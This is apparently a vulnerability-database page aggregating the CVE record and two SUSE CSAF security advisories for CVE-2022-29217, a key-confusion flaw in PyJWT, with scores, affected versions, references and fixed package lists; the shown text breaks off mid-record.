Action not permitted
Modal body text goes here.
Modal Title
Modal Body
cve-2022-29217
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-19T07:48:17.217Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { name: "FEDORA-2022-3cf456dc20", tags: [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { name: "FEDORA-2022-4ae9110f51", tags: [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, { url: "https://www.vicarius.io/vsociety/posts/risky-algorithms-algorithm-confusion-in-pyjwt-cve-2022-29217", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "pyjwt", vendor: "jpadilla", versions: [ { status: "affected", version: ">= 1.5.0, < 2.4.0", }, ], }, ], descriptions: [ { lang: "en", value: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-327", description: "CWE-327: Use of a Broken or Risky Cryptographic Algorithm", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-06-01T05:06:14", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { name: "FEDORA-2022-3cf456dc20", tags: [ "vendor-advisory", "x_refsource_FEDORA", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { name: "FEDORA-2022-4ae9110f51", tags: [ "vendor-advisory", "x_refsource_FEDORA", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, ], source: { advisory: "GHSA-ffqj-6fqr-9h24", discovery: "UNKNOWN", }, title: "Key confusion through non-blocklisted public key formats in PyJWT", x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security-advisories@github.com", ID: "CVE-2022-29217", STATE: "PUBLIC", TITLE: "Key confusion through non-blocklisted public key formats in PyJWT", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "pyjwt", version: { version_data: [ { version_value: ">= 1.5.0, < 2.4.0", }, ], }, }, ], }, vendor_name: "jpadilla", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", }, ], }, impact: { cvss: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-327: Use of a Broken or Risky Cryptographic Algorithm", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", refsource: "CONFIRM", url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { name: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", refsource: "MISC", url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { name: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", refsource: "MISC", url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { name: "FEDORA-2022-3cf456dc20", refsource: "FEDORA", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/", }, { name: "FEDORA-2022-4ae9110f51", refsource: "FEDORA", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/", }, ], }, source: { advisory: "GHSA-ffqj-6fqr-9h24", discovery: "UNKNOWN", }, }, }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2022-29217", datePublished: "2022-05-24T14:10:10", dateReserved: "2022-04-13T00:00:00", dateUpdated: "2024-08-19T07:48:17.217Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", "vulnerability-lookup:meta": { nvd: "{\"cve\":{\"id\":\"CVE-2022-29217\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2022-05-24T15:15:07.767\",\"lastModified\":\"2024-11-21T06:58:44.463\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.\"},{\"lang\":\"es\",\"value\":\"PyJWT es una implementación en Python del RFC 7519. PyJWT soporta múltiples algoritmos de firma JWT diferentes. Con JWT, un atacante que envía el token JWT puede elegir el algoritmo de firma usado. La biblioteca PyJWT requiere que la aplicación elija qué algoritmos son soportados. La aplicación puede especificar \\\"jwt.algorithms.get_default_algorithms()\\\" para conseguir soporte para todos los algoritmos, o especificar un único algoritmo. El problema no es tan grande ya que debe ser usado \\\"algorithms=jwt.algorithms.get_default_algorithms()\\\". Los usuarios deben actualizar a la versión 2.4.0 para recibir un parche para este problema. Como mitigación, sea siempre explícito con los algoritmos que son aceptados y son esperados cuando es decodificado\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:P/A:N\",\"baseScore\":5.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-327\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.5.0\",\"versionEndExcluding\":\"2.4.0\",\"matchCriteriaId\":\"8F4B0C65-A921-4799-A7E3-C67A61940377\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"80E516C0-98A4-4ADE-B69F-66A772E2BAAA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD\"}]}]}],\"references\":[{\"url\":\"https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/jpadilla/pyjwt/releases/tag/2.4.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/jpadilla/pyjwt/releases/tag/2.4.0\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Issue Tracking\",\"Third Party Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.vicarius.io/vsociety/posts/risky-algorithms-algorithm-confusion-in-pyjwt-cve-2022-29217\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}", }, }
suse-su-2022:3545-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-PyJWT", title: "Title of the patch", }, { category: "description", text: "This update for python-PyJWT fixes the following issues:\n\n- CVE-2022-29217: Fixed key confusion through non-blocklisted public key formats (bsc#1199756).\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2022-3545,SUSE-SLE-Module-Public-Cloud-15-2022-3545", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2022_3545-1.json", }, { category: "self", summary: "URL for SUSE-SU-2022:3545-1", url: "https://www.suse.com/support/update/announcement/2022/suse-su-20223545-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2022:3545-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-October/012512.html", }, { category: "self", summary: "SUSE Bug 1199756", url: "https://bugzilla.suse.com/1199756", }, { category: "self", summary: "SUSE CVE CVE-2022-29217 page", url: "https://www.suse.com/security/cve/CVE-2022-29217/", }, ], title: "Security update for python-PyJWT", tracking: { current_release_date: "2022-10-06T15:03:23Z", generator: { date: "2022-10-06T15:03:23Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2022:3545-1", initial_release_date: "2022-10-06T15:03:23Z", revision_history: [ { date: "2022-10-06T15:03:23Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-PyJWT-1.5.3-150000.3.3.1.noarch", product: { name: "python2-PyJWT-1.5.3-150000.3.3.1.noarch", product_id: "python2-PyJWT-1.5.3-150000.3.3.1.noarch", }, }, { category: "product_version", name: "python3-PyJWT-1.5.3-150000.3.3.1.noarch", product: { name: "python3-PyJWT-1.5.3-150000.3.3.1.noarch", product_id: "python3-PyJWT-1.5.3-150000.3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 15", product: { name: "SUSE Linux Enterprise Module for Public Cloud 15", product_id: "SUSE Linux Enterprise Module for Public Cloud 15", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:15", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.5.3-150000.3.3.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15", product_id: "SUSE Linux Enterprise Module for Public Cloud 15:python3-PyJWT-1.5.3-150000.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.5.3-150000.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 15", }, ], }, vulnerabilities: [ { cve: "CVE-2022-29217", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29217", }, ], notes: [ { category: "general", text: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-PyJWT-1.5.3-150000.3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2022-29217", url: "https://www.suse.com/security/cve/CVE-2022-29217", }, { category: "external", summary: "SUSE Bug 1199756 for CVE-2022-29217", url: "https://bugzilla.suse.com/1199756", }, { category: "external", summary: "SUSE Bug 1223417 for CVE-2022-29217", url: "https://bugzilla.suse.com/1223417", }, { category: "external", summary: "SUSE Bug 1226138 for CVE-2022-29217", url: "https://bugzilla.suse.com/1226138", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-PyJWT-1.5.3-150000.3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 15:python3-PyJWT-1.5.3-150000.3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2022-10-06T15:03:23Z", details: "important", }, ], title: "CVE-2022-29217", }, ], }
suse-su-2023:0794-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "critical", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-PyJWT", title: "Title of the patch", }, { category: "description", text: "This update for python-PyJWT fixes the following issues:\n\n- CVE-2022-29217: Fixed Key confusion through non-blocklisted public key formats (bsc#1199756).\n\n- Update in SLE-15 (bsc#1199282, jsc#PM-3243, jsc#SLE-24629)\n\n- Update to 2.4.0 (bsc#1199756)\n - Explicit check the key for ECAlgorithm\n - Don't use implicit optionals\n - documentation fix: show correct scope \n - fix: Update copyright information\n - Don't mutate options dictionary in .decode_complete()\n - Add support for Python 3.10\n - api_jwk: Add PyJWKSet.__getitem__\n - Update usage.rst\n - Docs: mention performance reasons for reusing RSAPrivateKey\n when encoding\n - Fixed typo in usage.rst\n - Add detached payload support for JWS encoding and decoding\n - Replace various string interpolations with f-strings by\n\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2023-794,SUSE-SLE-Module-Basesystem-15-SP4-2023-794,SUSE-SLE-Product-HPC-15-SP2-LTSS-2023-794,SUSE-SLE-Product-HPC-15-SP3-ESPOS-2023-794,SUSE-SLE-Product-HPC-15-SP3-LTSS-2023-794,SUSE-SLE-Product-RT-15-SP3-2023-794,SUSE-SLE-Product-SLES-15-SP2-LTSS-2023-794,SUSE-SLE-Product-SLES-15-SP3-LTSS-2023-794,SUSE-SLE-Product-SLES_SAP-15-SP2-2023-794,SUSE-SLE-Product-SLES_SAP-15-SP3-2023-794,SUSE-SLE-Product-SUSE-Manager-Proxy-4.2-2023-794,SUSE-SLE-Product-SUSE-Manager-Server-4.2-2023-794,SUSE-Storage-7-2023-794,SUSE-Storage-7.1-2023-794,openSUSE-SLE-15.4-2023-794", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2023_0794-1.json", }, { category: "self", summary: "URL for SUSE-SU-2023:0794-1", url: "https://www.suse.com/support/update/announcement/2023/suse-su-20230794-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2023:0794-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2023-March/014081.html", }, { category: "self", summary: "SUSE Bug 1176785", url: "https://bugzilla.suse.com/1176785", }, { category: "self", summary: "SUSE Bug 1199282", url: "https://bugzilla.suse.com/1199282", }, { category: "self", summary: "SUSE Bug 1199756", url: "https://bugzilla.suse.com/1199756", }, { category: "self", summary: "SUSE CVE CVE-2022-29217 page", url: "https://www.suse.com/security/cve/CVE-2022-29217/", }, ], title: "Security update for python-PyJWT", tracking: { current_release_date: "2023-03-17T07:42:24Z", generator: { date: "2023-03-17T07:42:24Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2023:0794-1", initial_release_date: "2023-03-17T07:42:24Z", revision_history: [ { date: "2023-03-17T07:42:24Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", product: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", product_id: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Basesystem 15 SP4", product: { name: "SUSE Linux Enterprise Module for Basesystem 15 SP4", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP4", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-basesystem:15:sp4", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product: { name: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sle_hpc-ltss:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS", product: { name: "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS", product_identification_helper: { cpe: "cpe:/o:suse:sle_hpc-espos:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS", product: { name: "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sle_hpc-ltss:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Real Time 15 SP3", product: { name: "SUSE Linux Enterprise Real Time 15 SP3", product_id: "SUSE Linux Enterprise Real Time 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:sle_rt:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server 15 SP2-LTSS", product: { name: "SUSE Linux Enterprise Server 15 SP2-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP2-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sles-ltss:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server 15 SP3-LTSS", product: { name: "SUSE Linux Enterprise Server 15 SP3-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP3-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sles-ltss:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", product: { name: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", product_id: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", product_identification_helper: { cpe: "cpe:/o:suse:sles_sap:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server for SAP Applications 15 SP3", product: { name: "SUSE Linux Enterprise Server for SAP Applications 15 SP3", product_id: "SUSE Linux Enterprise Server for SAP Applications 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:sles_sap:15:sp3", }, }, }, { category: "product_name", name: "SUSE Manager Proxy 4.2", product: { name: "SUSE Manager Proxy 4.2", product_id: "SUSE Manager Proxy 4.2", product_identification_helper: { cpe: "cpe:/o:suse:suse-manager-proxy:4.2", }, }, }, { category: "product_name", name: "SUSE Manager Server 4.2", product: { name: "SUSE Manager Server 4.2", product_id: "SUSE Manager Server 4.2", product_identification_helper: { cpe: "cpe:/o:suse:suse-manager-server:4.2", }, }, }, { category: "product_name", name: "SUSE Enterprise Storage 7", product: { name: "SUSE Enterprise Storage 7", product_id: "SUSE Enterprise Storage 7", product_identification_helper: { cpe: "cpe:/o:suse:ses:7", }, }, }, { category: "product_name", name: "SUSE Enterprise Storage 7.1", product: { name: "SUSE Enterprise Storage 7.1", product_id: "SUSE Enterprise Storage 7.1", product_identification_helper: { cpe: "cpe:/o:suse:ses:7.1", }, }, }, { category: "product_name", name: "openSUSE Leap 15.4", product: { name: "openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.4", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP4", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Basesystem 15 SP4", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise Real Time 15 SP3", product_id: "SUSE Linux Enterprise Real Time 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise Real Time 15 SP3", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server 15 SP2-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server 15 SP3-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2", product_id: 